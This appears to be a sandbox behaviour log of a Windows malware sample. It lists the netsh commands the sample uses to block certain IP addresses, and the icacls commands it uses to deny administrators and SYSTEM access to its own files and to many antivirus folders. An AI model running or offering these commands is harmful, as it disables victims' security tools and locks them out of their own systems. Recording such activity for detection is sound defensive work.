C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.814⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.815⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.814⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.815⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.224⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.225⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.224⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.225⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.1864⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.1865⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.1864⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.1865⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.1694⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.1695⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.1694⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.1695⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.114⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.115⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.114⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.115⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.2364⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.2365⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.2364⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.2365⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.614⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.615⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.614⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.615⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.1024⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.1025⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.1024⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.1025⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.1514⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.1515⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.1514⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.1515⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls ""C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls ""C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls ""C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls ""C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls ""C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls ""C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls ""C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls ""C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls ""C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls ""C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls ""C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls ""C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\kz.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\kz.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\script.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\script.exe /deny System:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\olly.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\olly.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass2.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass2.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\boy.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\boy.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
